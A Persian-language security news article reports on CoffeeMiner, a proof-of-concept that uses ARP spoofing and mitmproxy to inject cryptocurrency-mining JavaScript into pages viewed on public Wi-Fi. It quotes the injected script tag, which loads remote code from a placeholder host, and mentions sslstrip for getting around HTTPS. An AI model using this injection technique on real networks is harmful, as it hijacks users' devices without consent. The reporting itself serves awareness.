با ما به‌روز باشید!
info[at]nsec.ir
(+98)-313-3915336

CoffeeMiner، پروژه‌ی هک شبکه‌های وای‌فای برای استخراج ارز مجازی

خلاصه: توسعه‌دهنده‌ای به نام Arnau یک پروژه‌ی اثبات مفهومی به‌نام CaffeeMiner را منتشر کرده است. این پروژه برای هک شبکه‌های عمومی وای‌وای برای تزریق کد استخراج ارزمجازی به نشست‌ها ایجاد شده است و با جعل پیام‌های ARP بر روی شبکه‌ی محلی به منظور جدا کردن ترافیک از دستگاه‌های دیگر روی شبکه کار می‌کند.

 

افزایش چشم‌گیر ارزش بیت‌کوین، نظر هکرها و متقلبان را به‌سمت اتخاذ هر روشی برای سرقت کیف پول‌های مجازی یا منابع محاسباتی از قربانیان جلب کرده است.

توسعه‌دهنده‌ای به نام Arnau یک پروژه‌ی اثبات مفهومی به‌نام CaffeeMiner را منتشر کرده است. این پروژه برای هک شبکه‌های عمومی وای‌وای برای تزریق کد استخراج ارزمجازی به نشست‌ها ایجاد شده است.

به گفته‌ی کارشناسان این پروژه الهام‌گرفته از مورد Starbucks است که در آن هکرها از عملیات hijack علیه لپ‌تاپ‌های متصل به شبکه‌ی وای‌فای استفاده می‌کردند تا از قدرت محاسباتی دستگاه‌ها برای استخراج ارزمجازی بهره‌برداری کنند.

Arnau توضیح داده‌است که چگونه با یک حمله‌ی مردمیانی می‌توان کد جاوااسکریپت در صفحات HTMLی که کاربر متصل شده، به آن‌ها دست می‌یابد تزریق کرد. در این روش همه‌ی دستگاه‌ها متصل شده به شبکه‌ی وای‌فای مجبور به استخراج یک ارزمجازی می‌شوند.

CoffeeMiner با جعل پیام‌های ARP بر روی شبکه‌ی محلی به منظور جدا کردن ترافیک از دستگاه‌های دیگر روی شبکه کار می‌کند.

حمله‌ی مرد میانی با استاده از نرم‌افزار mitmproxy انجام می‌شود که امکان تزریق خط کد HTML زیر به ترافیک رمزنشده‌ی مرتبط با محتوای درخواست شوده توسط کاربر بر روی شبکه را می‌دهد:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>

هنگامی که مرورگر کاربر صفحات را با کد تزریق شده بارگذاری می‌کند، کد جاوااسکریپت  اجرا می‌گردد و از CPU برای تولید Monero با استفاده از نرم‌افزار استخراج ارزمجازی CoinHive سوءاستفاده می‌کند.

CoffeeMiner منتشرشده توسط این محقق با HTTPS کار نمی‌کند، اما این محدودیت می‌تواند با sslstrip کنار زده شود.

Arnau این پروژه را در گیت‌هاب منتش کرده است.